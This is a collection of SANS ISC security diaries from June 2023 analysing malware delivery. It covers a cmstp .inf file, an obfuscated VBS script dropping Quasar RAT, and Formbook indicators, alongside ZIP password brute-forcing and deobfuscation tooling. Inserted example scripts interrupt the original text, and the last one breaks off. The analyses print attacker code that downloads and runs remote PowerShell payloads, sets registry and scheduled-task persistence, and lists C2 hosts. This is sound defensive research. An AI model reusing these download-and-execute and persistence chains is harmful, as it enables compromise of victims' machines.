ISC Stormcast For Tuesday, June 20th, 2023 https://isc.sans.edu/podcastdetail/8544, (Tue, Jun 20th)
Malware Delivered Through .inf File, (Mon, Jun 19th)
Microsoft has used “.inf” files for a while[1]. They are simple text files and contain setup information in a driver package. They describe what must be performed to install a driver package on a device. When you read them, the syntax is straightforward to understand. The file is based on sections that describe what must be performed. One of them is very interesting for attackers: [RunPreSetupCommandsSection]. Note that .inf files cannot be executed “as is”.
The malicious file I found has the following section:
[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hiDden iex ((New-Object System.Net.WebClient).DownloadString('hxxps://cdn[.]discordapp[.]com/attachments/1114670648028049408/1119347463023759521/task.ps1'))
taskkill /IM CMsTp.exe /F
The payload ‘task.ps1’ contains the following code:
$webContent = Invoke-WebRequest -Uri "hxxps://cdn[.]discordapp[.]com/attachments/1114670648028049408/1119333871213879356/get.txt"
New-Item -Path "HKCU:\Software\lath3";
Set-ItemProperty -Path "HKCU:\Software\lath3" -Name "lath2" -Force -Value $webContent.Content;
$action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-w hiDden $you=[Convert]::FromBase64String((gp "HKCU:\Software\lath3").lath2);[Reflection.Assembly]::Load($you);[QJAMsrpfhk.HH]::Main()'
$trigger = New-ScheduledTaskTrigger -AtStartup
Register-ScheduledTask -Action $action -RunLevel Highest Force -Trigger $trigger -TaskName "Demo" -Description "Shane"
The payload ‘get.txt’ contains a Base64-encoded executable that will be decoded and loaded by PowerShell. It’s a DLL with a VT score of 31/70 (SHA256:15b97c5182a30d4c85b31835b44d978dc065892587a7656038575bd32a62ac32).
The PowerShell script can be categorized as "fileless" because it saves the payload in a registry key (HKCU:\Software\lath3\lath2) and creates a scheduled task to implement persistence. The PowerShell script will be launched every time the compromised host reboots.
There is more interesting information in the .inf file:
[Strings]
ServiceName="CorpVPN"
ShortSvcName="CorpVPN"
The file is called 'cmstp.inf'. cmstp.exe is a LOLbin, a tool provided by Microsoft for managing Connection Provider service profiles[2]. It can handle .inf files like this:
cmstp.exe [/nf] [/s] [/u] [drive:][path]serviceprofilefilename.inf
Here is the parent PowerShell script named uas32.ps1 (SHA256:20295311db1228935ddbba18678c88db78b4fc7efb54d2853cfb801851de0e19). It is obfuscated with a classic technique:
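An added example (not the diary's code): a Python triage script for .inf files of the kind shown above. It parses the sections, resolves the sections named by RunPreSetupCommands/RunPostSetupCommands keys (those key names are assumed from the cmstp profile layout; the diary only shows [RunPreSetupCommandsSection], which is therefore also checked by default), and flags command lines with the traits seen in this sample. The .inf embedded below is constructed, with a placeholder URL.

```python
import re

# Keys in a profile's install section that name the command sections.
# Assumed from the cmstp profile .inf layout; the diary shows only
# [RunPreSetupCommandsSection], so that name is also checked by default.
RUN_KEYS = ("runpresetupcommands", "runpostsetupcommands")
DEFAULT_RUN_SECTIONS = ("runpresetupcommandssection",)

# (regex, reason) pairs evaluated case-insensitively on each command line.
INDICATORS = [
    (r"powershell(\.exe)?\b", "invokes PowerShell"),
    (r"-w(indowstyle)?\s+hidden", "hides the console window"),
    (r"\biex\b|invoke-expression", "evaluates text as code"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", "downloads from the network"),
    (r"https?://", "references a URL"),
    (r"\btaskkill\b.*cmstp", "kills cmstp.exe (hides the installer dialog)"),
]


def parse_inf(text):
    """Return {section_name_lowercased: [lines]}; full-line ';' comments are dropped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        m = re.match(r"^\[(.+?)\]$", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def command_sections(sections):
    """Names of sections whose lines cmstp executes as commands."""
    names = set(DEFAULT_RUN_SECTIONS)
    for lines in sections.values():
        for line in lines:
            key, sep, value = line.partition("=")
            if sep and key.strip().lower() in RUN_KEYS:
                names.add(value.strip().lower())
    return sorted(n for n in names if n in sections)


def profile_strings(sections):
    """The [Strings] table (e.g. ServiceName) with surrounding quotes removed."""
    out = {}
    for line in sections.get("strings", []):
        key, sep, value = line.partition("=")
        if sep:
            out[key.strip()] = value.strip().strip('"')
    return out


def scan_inf(text):
    """One finding per command line matching at least one indicator."""
    sections = parse_inf(text)
    findings = []
    for name in command_sections(sections):
        for cmd in sections[name]:
            reasons = [why for pat, why in INDICATORS if re.search(pat, cmd, re.I)]
            if reasons:
                findings.append({"section": name, "command": cmd, "reasons": reasons})
    return findings


# Constructed sample modelled on the diary's cmstp.inf; the URL is a placeholder.
SAMPLE_INF = r"""[version]
Signature=$chicago$

[DefaultInstall]
RunPreSetupCommands=RunPreSetupCommandsSection

[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hiDden iex ((New-Object System.Net.WebClient).DownloadString('https://example.invalid/task.ps1'))
taskkill /IM CMsTp.exe /F

[Strings]
ServiceName="CorpVPN"
ShortSvcName="CorpVPN"
"""

if __name__ == "__main__":
    for f in scan_inf(SAMPLE_INF):
        print(f["section"], "|", f["command"][:60], "|", ", ".join(f["reasons"]))
    print(profile_strings(parse_inf(SAMPLE_INF)))
```

The ServiceName from [Strings] is what the victim would see in the installer dialog, so it is worth recording alongside the flagged commands.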
(NEw-Object MAnaGEMENt.auToMAtiON.psCreDENTIaL ' ', ( ' ... <payload> ... ' |coNVertTO-SEcUrEStrinG -ke (13..28))).GETNetwOrkCrEDentIal().PAsSWORD |Iex
I don't cover the complete script because it's not relevant. The interesting part is the following:
. Set-INFFile
#Needs Windows forms
add-type -AssemblyName System.Windows.Forms
If (Test-Path $InfFileLocation) {
#Command to run
$ps = new-object system.diagnostics.processstartinfo "c:\windows\system32\cmstp.exe"
$ps.Arguments = "/au $InfFileLocation"
$ps.UseShellExecute = $false
The initial script will dump the file 'cmstp.inf' on disk and invoke cmstp.exe as described above. It is delivered to the victim in a CAB file (SHA256:fb4f92adc2a9c920ce9a77d1f66050c69728d1f3773c02f9da42e7809fb10d1c).
To summarize, we have this flow of infection:
CAB file -> uas32.ps1 -> cmstp.exe with cmstp.inf -> Scheduled task -> Malicious DLL
[1] https://learn.microsoft.com/en-us/windows-hardware/drivers/install/overview-of-inf-files
[2] https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Brute-Force ZIP Password Cracking with zipdump.py, (Sun, Jun 18th)
Gebhard's diary entry "Brute Forcing Simple Archive Passwords" inspired me to make an update to my zipdump.py tool to add brute-force password cracking.
Years ago, I added dictionary password cracking to zipdump.py (a tool to analyze ZIP files).
Hence adding a brute-force attack mode would be simple.
One can start a zipdump dictionary attack with options -P (passwordfile) or --passwordfilestop. You give it a text file with passwords to try (like rockyou), or you use file name ".", and then it uses a small builtin list (that's the John the Ripper public domain password list).
Now, with the latest version, you can start brute-force attack mode with the following special filename: #b#.
This starts a brute-force attack, with password guesses from 1 to 3 characters long, and characters selected from these sets of characters: uppercase and lowercase ASCII letters, digits, all punctuation characters (Python's definition) and space character.
When I run this on Gebhard's sample, the password is not recovered:
The brute-force attack ran at almost 25,000 password guesses per second on the laptop I tested this on.
Now let's change some parameters. Gebhard found that the password is 4 characters long, and consisted of uppercase letters and digits.
I'm using these parameters: maximum=4,charsets=lud
This starts a brute-force attack of passwords consisting of uppercase and lowercase letters and digits, between 1 and 4 characters long.
With these parameters, it took 505 seconds to recover the password: X353.
ZIP files that are encrypted with AES (like the samples you get from Malware Bazaar) require installation of the pyzipper module and are way slower to crack (less than 2,000 password guesses per second on the same laptop).
Note that this solution only handles ZIP files, and not all archive types like Gebhard's shell script does.
zipdump can also generate false positives. ZIP files that can be opened with a guessed password through the zipfile/pyzipper API may still throw an error when the full content is actually read:
This is something I will fix in an upcoming version.
This dictionary and brute-force password cracking is just a convenience feature for me, to crack simple or popular passwords. For more complex passwords, I use hashcat.
Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com
Formbook from Possible ModiLoader (DBatLoader) , (Sat, Jun 17th)
Introduction
I'm currently doing a "30 days of Formbook" collection effort, generating infection traffic from recent Formbook samples and posting the results to my blog. On Friday 2023-06-16, I ran across an example that kicks off with an Excel file exploiting CVE-2017-11882 to use what seems like ModiLoader (also known as DBatLoader).
I previously wrote about ModiLoader for Remcos RAT in an ISC diary last month. In today's diary, I'll review an infection that I think is ModiLoader Formbook from my infection run yesterday (Friday, 2023-06-16).
Shown above: Flow chart for my Formbook infection from possible ModiLoader.
The Initial Lure
The initial lure was a file created with Excel to exploit an old vulnerability, CVE-2017-11882. I used a Windows 7 host with Office 2007 as a vulnerable system in my lab to test the sample.
Shown above: The initial lure opened in Office 2007 Excel.
After opening the initial lure, the file retrieved a loader-style EXE, and that loader-style EXE retrieved base64 text over HTTPS from qu[.]ax as shown below. Approximately one minute later, the Formbook C2 traffic started.
Shown above: Traffic from the infection run filtered in Wireshark.
Checking the loader EXE in a sandbox revealed the loader retrieved a base64 text file from hxxps://qu[.]ax/NNAs.wav. The base64 text represents a malicious DLL file in reverse byte order. Fortunately, CyberChef can easily decode the text and return the binary.
Shown above: Downloading the loader EXE's payload from hxxps://qu[.]ax/NNAs.wav in a web browser.
Shown above: Checking the downloaded file to find it's base64 text.
Shown above: Decoding the base64 text file in CyberChef to reveal a malicious EXE or DLL.
Shown above: Checking the converted file and discovering it's a DLL.
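A scripted version of the CyberChef steps above, as an added example (not from this diary): it recovers the binary from the base64 text and reads the COFF header to tell a DLL from an EXE. The diary does not say whether the byte reversal is applied before or after the base64 step, so both orders are tried; the sample is a constructed, non-executable stand-in for the real payload.

```python
import base64
import binascii
import struct

IMAGE_FILE_DLL = 0x2000  # Characteristics flag in the COFF file header

def pe_kind(data: bytes):
    # Returns "DLL", "EXE" or None after checking the MZ and PE\0\0 signatures
    # and the IMAGE_FILE_DLL bit of the COFF Characteristics field.
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    characteristics = struct.unpack_from("<H", data, e_lfanew + 22)[0]
    return "DLL" if characteristics & IMAGE_FILE_DLL else "EXE"

def recover_payload(text: str):
    # The diary does not say whether the reversal happens before or after the
    # Base64 step, so both orders are tried; returns (order, bytes, kind) for
    # the first one that yields a PE image, or (None, b"", None).
    cleaned = "".join(text.split())
    attempts = (
        ("base64-decode then reverse bytes",
         lambda t: base64.b64decode(t, validate=True)[::-1]),
        ("reverse text then base64-decode",
         lambda t: base64.b64decode(t[::-1], validate=True)),
    )
    for label, transform in attempts:
        try:
            blob = transform(cleaned)
        except (binascii.Error, ValueError):
            continue
        kind = pe_kind(blob)
        if kind:
            return label, blob, kind
    return None, b"", None

def make_fake_pe(characteristics: int) -> bytes:
    # Constructed stand-in for a real image: an MZ header whose e_lfanew points
    # at a PE signature and COFF header, followed by padding. Not executable.
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, characteristics)
    return dos + coff + b"\0" * 32

# Constructed sample text in the same shape as the NNAs.wav download: the
# (fake) DLL with its bytes reversed, then Base64-encoded.
SAMPLE_TEXT = base64.b64encode(make_fake_pe(0x2102)[::-1]).decode()
```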
Post-infection Forensics
Examining my infected lab host revealed the loader EXE was made persistent through the Windows registry. My investigation also found a copy of MSBuild.exe (a legitimate file for the Microsoft Build Engine) made persistent in the same manner I usually see for Formbook. I've done similar, undocumented infection runs with confirmed ModiLoader samples for Formbook, and each of those also had some sort of non-Formbook, legitimate file where I would normally see a Formbook EXE. This seems common for ModiLoader Formbook infections.
Shown above: Artifacts from my infection run.
Indicators of Compromise (IOCs)
The following are the malware/artifacts from this infection run:
SHA256 hash: 4f6e9a66f50f443d07676ef43a7f2349fc713c96522058c1c4d425da7be4a4bf
File size: 1,821,184 bytes
File name: DC293_payment.xls
File type: Composite Document File V2 Document (created with Excel)
File description: File exploiting CVE-2017-11882 in vulnerable versions of Microsoft Excel
SHA256 hash: 8566d2bf58fe371e646076c60874a8fbb50de2fbf9b950c457804d316a3de89f
File size: 94,208 bytes
File location: hxxp://23.94.144[.]13/555/vbc.exe
File location: C:\Users\Public\cleanmgr_rse.exe
Persistent file location: C:\Users\[username]\AppData\Roaming\bestm.exe
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File description: possible ModiLoader (DBatLoader) EXE for Formbook version 4.1
SHA256 hash: 16c7760898572422cac97f705e9076c35610a07fbc40aaa91b5663af923cdca7
File size: 1,036,972 bytes
File location: hxxps://qu[.]ax/NNAs.wav
File type: ASCII text, with very long lines (65536), with no line terminators
File description: Base64 text retrieved by ModiLoader for Formbook
Note: File decodes to a Windows DLL in reverse byte order
SHA256 hash: cfc4f6c4931fc8df03919d96181178a903a6ccd39eb5268ac00b3a223c027b5b
File size: 777,728 bytes
File type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
File description: Windows DLL converted from the above Base64 text
Run method: unknown
SHA256 hash: d94e9ea7dce3dd4760f48356f14a986ea1fc8f1c84864105bf815a32284296ab
File size: 261,688 bytes
File location: C:\Program Files (x86)\W2d0\k6qlvnu84nj0.exe
File type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
File description: Copy of legitimate Microsoft file msbuild.exe (not inherently malicious)
Windows Registry key: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value 0
name: bestm
type: REG_SZ
data: "C:\Users\[username]\AppData\Roaming\bestm.exe"
Value 1
name: YDD0P4187
type: REG_SZ
data: C:\Program Files (x86)\W2d0\k6qlvnu84nj0.exe
HTTP GET and POST requests:
GET /tfgp/?[string of alphanumeric characters with the following mixed in: = _ + and /]
POST /tfgp/
Domains used for Formbook C2 traffic:
Final Words
Since this infection chain relies on a 2017 vulnerability, anyone with a Windows 10 or 11 host running an up-to-date/patched version of Microsoft Office will not be affected. When checked against VirusTotal, the malicious Excel, EXE, and DLL files have a decent detection rate. This is not a high-risk infection for many people. Perhaps the most interesting thing is that new malware samples exploiting CVE-2017-11882 like this one are submitted to VirusTotal on a daily (or near-daily) basis.
A packet capture (pcap) from the infection run, along with the associated malware and artifacts, is available here.
---
Brad Duncan
brad [at] malware-traffic-analysis.net
Another RAT Delivered Through VBS, (Fri, Jun 16th)
VBS looks popular these days! After Didier's latest diary, I found another interesting script. It started with an email that referenced a fake invoice due for payment. The invoice icon pointed to a URL. Usually, such URLs display a fake login page asking for credentials. Not this time.
PrivateEmail is an online service operated by NameCheap that offers email and collaboration tools (like a shared drive). It relies on Open-Xchange. They offer a free account for one mailbox and 5GB of storage. This is a simple way to deliver a payload, and the domain has a good reputation.
The shared file is “INV.10931.vbs” (SHA256:980b05b8a4ccbb444da3f7a1174e4c0e902a8ed199e4af2f3153e320809ab7cc) and has a low VT score (10/59). If you select the "Info" button on the top-right of the screen, you'll see that the file was modified on June 14th by "helen@alpinearospace.com". This domain was registered at NameCheap on May 26th. This is probably the free account created by the attacker. Did you spot the typosquatting related to the domain alpineaerospace.com[1]?
Let’s have a look at the content. This file uses a lot of obfuscation techniques! The first one is the encoding. The file starts with the byte order mark 0xFFFE: it is Unicode (UTF-16) encoded. This means that it won’t match simple scripts running on Linux environments:
remnux@remnux:/MalwareZoo/20230615$ xxd INV.10931.vbs |head -5
00000000: fffe 0d00 0a00 0d00 0a00 0d00 0a00 0d00  ................
00000010: 0a00 0d00 0a00 0d00 0a00 0d00 0a00 0d00  ................
00000020: 0a00 2700 2f00 2f00 2f00 2f00 2f00 2f00  ..'././././././.
00000030: 2f00 2f00 2f00 2f00 2f00 2f00 2f00 2f00  /./././././././.
00000040: 2f00 2f00 2f00 2f00 2f00 2f00 2f00 2f00  /./././././././.
Then, the script is polluted with plenty of repeated functions that do nothing (junk code):
remnux@remnux:/MalwareZoo/20230615$ cat INV.10931.vbs | tr -d '\00' | grep ^Function | wc -l
87
Let’s clean up the file and also remove the comments:
remnux@remnux:/MalwareZoo/20230615$ cat INV.10931.vbs | tr -d '\00' | grep -v "^'" | sed -e '/^Function/,/^End Function/d' wwoye:iufpc:wwoye:iufpc:wwoye:iufpc:wwoye:iufpc:wwoye: wwoye:iufpc:wwoye:iufpc:wwoye:iufpc:wwoye:iufpc:wwoye: wwoye:iufpc:wwoye:iufpc:wwoye:iufpc:wwoye:iufpc:wwoye: dim uRUs uRUs = WScript.ScriptFullName HwxcO = ("J1 Bu1 Gs1 b1 Bp1 G01 I1 1 91 C1 1 Jw1 w1 DE1 Mg1 z1 DQ1 Jw1 71 CQ1 awBn1 HQ1 b1 B31 C1 1 PQ1 g1 Cc1 JQBw1 Ho1 QQBj1 E81 ZwBJ1 G41 TQBy1 CU1 Jw1 71 Fs1 QgB51 HQ1 ZQBb1 F01 XQ1 g1 CQ1 cwBz1 Hg1 dQBw1 C1 1 PQ1 g1 Fs1 cwB51 HM1 d1 Bl1 G01 LgBD1 G81 bgB21 GU1 cgB01 F01 Og1 61 EY1 cgBv1 G01 QgBh1 HM1 ZQ1 21 DQ1 UwB01 HI1 aQBu1 Gc1 K1 1 g1 Cg1 TgBl1 Hc1 LQBP1 GI1 agBl1 GM1 d1 1 g1 E41 ZQB01 C41 VwBl1 GI1 QwBs1 Gk1 ZQBu1 HQ1 KQ1 u1 EQ1 bwB31 G41 b1 Bv1 GE1 Z1 BT1 HQ1 cgBp1 G41 Zw1 o1 C1 1 K1 BO1 GU1 dw1 t1 E81 YgBq1 GU1 YwB01 C1 1 TgBl1 HQ1 LgBX1 GU1 YgBD1 Gw1 aQBl1 G41 d1 1 p1 C41 R1 Bv1 Hc1 bgBs1 G81 YQBk1 FM1 d1 By1 Gk1 bgBn1 Cg1 JwBo1 HQ1 d1 Bw1 HM1 Og1 v1 C81 c1 Bh1 HM1 d1 Bl1 GI1 aQBu1 C41 YwBv1 G01 LwBy1 GE1 dw1 v1 F1 1 VQBn1 G01 VQBU1 Gk1 S1 1 n1 Ck1 I1 1 p1 C1 1 KQ1 71 Fs1 cwB51 HM1 d1 Bl1 G01 LgBB1 H1 1 c1 BE1 G81 bQBh1 Gk1 bgBd1 Do1 OgBD1 HU1 cgBy1 GU1 bgB01 EQ1 bwBt1 GE1 aQBu1 C41 T1 Bv1 GE1 Z1 1 o1 CQ1 cwBz1 Hg1 dQBw1 Ck1 LgBH1 GU1 d1 BU1 Hk1 c1 Bl1 Cg1 JwBD1 GQ1 VwBE1 GQ1 Qg1 u1 EQ1 SwBl1 FM1 dgBs1 Cc1 KQ1 u1 Ec1 ZQB01 E01 ZQB01 Gg1 bwBk1 Cg1 JwBO1 G41 SQBh1 FU1 cQ1 n1 Ck1 LgBJ1 G41 dgBv1 Gs1 ZQ1 o1 CQ1 bgB11 Gw1 b1 1 s1 C1 1 WwBv1 GI1 agBl1 GM1 d1 Bb1 F01 XQ1 g1 Cg1 JwBq1 G01 cwBS1 G41 V1 BY1 EY1 R1 BD1 FY1 e1 1 v1 GQ1 YQBv1 Gw1 bgB31 G81 Z1 1 v1 G01 bwBj1 C41 bwBp1 GU1 d1 Bz1 GE1 c1 1 v1 C81 OgBz1 H1 1 d1 B01 Gg1 Jw1 g1 Cw1 I1 1 k1 Gs1 ZwB01 Gw1 dw1 g1 Cw1 I1 1 n1 E81 YQBN1 Fk1 Qw1 n1 Cw1 I1 1 k1 G41 awBs1 Gk1 bQ1 s1 C1 1 Jw1 x1 Cc1 L1 1 g1 Cc1 UgBv1 GQ1 YQ1 n1 C1 1 KQ1 p1 Ds1 ") dim nabnr nabnr = ("$ExeNy = '") & HwxcO & "'" nabnr = nabnr & ";$KByHL = [system.Text.Encoding]::Unicode.GetString( " nabnr = nabnr & 
"[system.Convert]::FromBase64String( $ExeNy.replace('1 ','A') ) )"
nabnr = nabnr & ";$KByHL = $KByHL.replace('%pzAcOgInMr%', '" & uRUs & "');powershell -command $KByHL;"
set wcwpz = CreateObject("WScript.Shell")
wcwpz.Run "powershell -command " & (nabnr) , 0, false
We have another problem with the file. It won’t work as is. The variable “HwxcO” is a Base64-encoded string that has been polluted with a character that is replaced by ‘A’ during execution:
The character looks like a percent sign (“%”) with extra circles. It is the Unicode character 0x2031 (PER TEN THOUSAND SIGN)[2].
Let’s decode the Base64 with Cyberchef:
Now we have this script (beautified for easier reading):
$nklim = '01234';
$kgtlw = '%pzAcOgInMr%';
[Byte[]] $ssxup = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('hxxps://pastebin[.]com/raw/PUgmUTiH') ) );
[system.AppDomain]::CurrentDomain.Load($ssxup).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke( $null, [object[]] ('jmsRnTXFDCVx/daolnwod/moc.oietsap//:sptth' , $kgtlw , 'OaMYC', $nklim, '1', 'Roda' ));
You can see that more Base64 data is downloaded from pastebin.com. Unfortunately, the paste has been removed. However, it’s easy to understand the purpose of the script when you see something like:
[system.AppDomain]::CurrentDomain.Load($ssxup).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke()
Another payload will be downloaded from another paste website: hxxps://pasteio[.]com/download/xVCDFXTnRsmj (the string has been reversed). This payload was still online and is a Base64-encoded sample of a Quasar RAT[3] (SHA256:80ceb442697d42cb5ba74d201b128b805d135b37ca3319560264406d0f73a8ab).
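The two transforms the script undoes at run time, as an added example (not code from the sample): the junk character stands in for 'A' in the Base64 of a UTF-16LE string, and the download URL is handed over reversed. The obfuscate() side is a constructed stand-in, since the attacker's encoder was not recovered; the sample string is constructed too.

```python
import base64

JUNK = "\u2031"  # PER TEN THOUSAND SIGN: the character the sample uses instead of 'A'

def obfuscate(script: str) -> str:
    # Constructed stand-in for the attacker's encoder (the real one was not
    # recovered): UTF-16LE, Base64, then every 'A' replaced by the junk character.
    return base64.b64encode(script.encode("utf-16-le")).decode().replace("A", JUNK)

def deobfuscate(blob: str) -> str:
    # Mirrors what the VBS does at run time: put 'A' back, Base64-decode, and
    # read the bytes as UTF-16LE, which is what [Text.Encoding]::Unicode means.
    return base64.b64decode(blob.replace(JUNK, "A")).decode("utf-16-le")

def unreverse(s: str) -> str:
    # The download URL is passed to the .NET method as a reversed string.
    return s[::-1]

SAMPLE = obfuscate("Write-Host 'constructed sample'")  # constructed, harmless
```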
Here is the extracted configuration, including the C2 servers:
{
  "c2": [
    "127.0.0.1:4782",
    "venomia[.]ddns[.]net:3202"
  ],
  "attr": {
    "startup_key": "Adobe Client Startup",
    "install_name": "Venom.exe",
    "log_directory": "Logs",
    "encryption_key": "8A1JLAOW6hwwDDbIAN4N",
    "reconnect_delay": 3000
  },
  "rule": "Quasar",
  "mutex": [
    "19qmFpMzgDFlPZQoYW"
  ],
  "botnet": "Venom ClientA",
  "family": "quasar",
  "version": "2.7.0.0"
}
[1] http://www.alpineaerospace.com
[2] https://www.compart.com/en/unicode/U+2031
[3] https://github.com/quasar/Quasar
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
ISC Stormcast For Friday, June 16th, 2023 https://isc.sans.edu/podcastdetail/8542, (Fri, Jun 16th)
Supervision and Verification in Vulnerability Management, (Thu, Jun 15th)
Managing vulnerabilities in operating systems and software can be challenging and even contentious. Opinions are divided among industry peers – some argue that security updates would be unnecessary if developers were held accountable for security vulnerabilities [1], while others assert that updating systems as soon as possible (where applicable) is a critical best practice for users [2]. Most clients in my consulting job adopt some form of vulnerability management paradigm, ranging from quarterly vulnerability assessments with remediation of the discovered vulnerabilities to automated vulnerability management programs where identified vulnerabilities are addressed as soon as possible. I noticed some peculiarities while providing consultancy services to a discerning customer's automated vulnerability management program. The automated vulnerability management product will not be discussed here, as it is neither the main focal point nor is this a debate on whether the product is trustworthy. Instead, the finding was serendipitous and stemmed from a simple drive to appropriately mitigate identified vulnerabilities in all systems. With the client's management support, we worked together to address the vulnerability in question while ensuring it was fully mitigated.
It all started when a new low-risk vulnerability was identified – the Adobe Acrobat Reader software installed on the client's assets (a Windows enterprise environment with a heavy majority of Windows 10 Version 22H2 clients) was identified to have JavaScript enabled. Typically, there is no business need for JavaScript to be enabled in Adobe Reader, especially if users only need to view documents and occasionally fill in simple form fields. As such, the vulnerability management tool advised that JavaScript be disabled and even provided steps to do so. In this case, the recommended action was to set the registry key HKLM\SOFTWARE\Policies\Adobe\Adobe Acrobat\DC\FeatureLockDown\bDisableJavaScript to the REG_DWORD value of 1. The change management team approved the configuration change, and the system administrator was tasked to implement the hardening configuration.
While reviewing the configuration change status, I also came across Adobe's own advisory on how to adjust the usage of JavaScript within their products [3]. Adobe's suggested configuration did not require administrative privileges or Windows registry modifications. I then had a random thought – what if the proposed configuration change by the vulnerability management tool did not work as intended, and JavaScript was still being enabled despite the registry key change?
An experiment was in order, and I was fortunate that the system administrator was game enough to allow me to test things out. We searched for a simple JavaScript PDF file [4], verified its functionality, and executed it on two clients – one configured according to the recommendations of the vulnerability management tool. In contrast, the other client was configured according to the documentation by Adobe. Of course, the clients were rebooted after the configuration.
Surprisingly, the client configured according to the documentation by Adobe did not allow JavaScript execution, while the client with the registry key modification allowed JavaScript to execute. This introduced a small challenge – clients that had the registry key modified were shown by the vulnerability management tool as having the vulnerability mitigated (the hardening process took place over a period of time). Meanwhile, the particular client with custom configuration within Adobe Acrobat Reader was shown as vulnerable to JavaScript execution even though it was configured to disable JavaScript execution. Management was notified immediately, and the stakeholders decided to roll back the previous configuration and implement the configuration suggested by Adobe. The vulnerability highlighted in the vulnerability management tool was added to the list of exceptions, with an explanation detailing the actual configuration and the client noting that the vulnerability had been resolved.
The adage of "Trust, but verify" appears to hold true. A quick literature review online regarding the registry key configuration yielded multiple positive reports (JavaScript was disabled). If the client had just implemented the change without verification, the vulnerability management tool would have shown that the vulnerability was resolved. However, the environment would still have been vulnerable to PDF JavaScript execution – a risk that the client's management was unwilling to accept. As such, verifying resolved vulnerabilities must be performed even if a vulnerability management program is in place. From a consulting perspective, professional skepticism (even though this is usually artic­ulated in accountancy audits) can add value to a client's cybersecurity posture and sometimes even yield unexpected findings in cybersecurity assessments.
References:
1. https://doi.ieeecomputersociety.org/10.1109/TSE.2022.3176674
2. https://doi.org/10.1145/3587826
3. https://helpx.adobe.com/acrobat/using/javascripts-pdfs-security-risk.html
4. https://acrobatusers.com/assets/collections/tutorials/legacy/tech_corners/javascript_corner/tips/2006/popup_windows_part2/AlertBoxExamples.pdf
-----------
Yee Ching Tok, Ph.D., ISC Handler
Personal Site
Mastodon
Twitter
ISC Stormcast For Thursday, June 15th, 2023 https://isc.sans.edu/podcastdetail/8540, (Thu, Jun 15th)
Deobfuscating a VBS Script With Custom Encoding, (Wed, Jun 14th)
A reader asked us for help with the deobfuscation of a VBS script (4cd33a3c0d5f655b1bec2be6cbde096ddef696fdcd1685a512703e08514346c0).
It contains line comments with gibberish (REM and ') to obfuscate the real script:
These can be removed with a grep -v and regexes ^REM and ^', like this:
This looks like an encoded payload. After these concatenations, we have more concatenations, but of single characters, and these do not seem to be encoded:
They can be grepped for:
And with re-search.py, the value of each string can be extracted (str-u: double-quoted string, unquoted):
All these lines can be joined together with sets.py:
This looks like a reversed URL. python-per-line.py can be used to reverse each line (line[::-1] is the Python expression to reverse a line):
A similar command can be used for the other variable (nP):
The obfuscated payload can be extracted like this:
I will dedicate a diary entry on analysis methods of this type of encoding, but let me already explain here very briefly how it works.
Every character of the script is represented by a token consisting of two upper-case letters. For example, character e is represented by token IZ.
The first 256 tokens in the above string define the translation table, and the rest of the tokens are the encoded payload. Here is a Python script to do the decoding:
def SplitLength(str, length):
    # cut str into consecutive chunks of the given length
    return [str[i:i + length] for i in range(0, len(str), length)]
def Decode(str, sizeToken, sizeTokenTable):
    translation = str[:sizeToken * sizeTokenTable]   # the first 256 tokens
    code = str[sizeToken * sizeTokenTable:]           # the encoded payload
    dTranslate = {token:counter for counter, token in enumerate(SplitLength(translation, sizeToken))}
    return ''.join([chr(dTranslate[token]) for token in SplitLength(code, sizeToken)])
The "dTranslate =" line builds a translation dictionary out of the first 256 tokens.
And the next line does the translation of the remaining tokens.
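The encoding scheme from both directions, as an added example (not the diary's script): an encoder that builds a table of 256 distinct two-letter tokens followed by the tokenised payload, and a decoder with the same position-to-code-point logic as Decode() above but with checks for a short or duplicated table and for unknown tokens. The encoder, seed and sample text are this example's constructions, not recovered from the malicious script.

```python
import random
import string

TOKEN_SIZE = 2     # each token is two upper-case letters, as in the sample
TABLE_SIZE = 256   # the first 256 tokens define the translation table

def split_tokens(data: str, size: int = TOKEN_SIZE) -> list:
    # Cut a string into fixed-size tokens (the diary's SplitLength).
    return [data[i:i + size] for i in range(0, len(data), size)]

def encode(text: str, seed: int) -> str:
    # Constructed counterpart of the decoder (not recovered from the sample):
    # pick 256 distinct tokens out of the 26*26 possible pairs, emit them as the
    # table, then emit the token standing for each character of the payload.
    # The seed only makes this example reproducible.
    if any(ord(ch) >= TABLE_SIZE for ch in text):
        raise ValueError("only code points 0..255 can be represented")
    pairs = [a + b for a in string.ascii_uppercase for b in string.ascii_uppercase]
    table = random.Random(seed).sample(pairs, TABLE_SIZE)  # table[i] stands for chr(i)
    return "".join(table) + "".join(table[ord(ch)] for ch in text)

def decode(data: str, size: int = TOKEN_SIZE, table_size: int = TABLE_SIZE) -> str:
    # Same algorithm as the diary's Decode(): a token's position in the table
    # is the code point it represents. Malformed tables are rejected instead of
    # silently mapping to the last duplicate, as a dict comprehension would.
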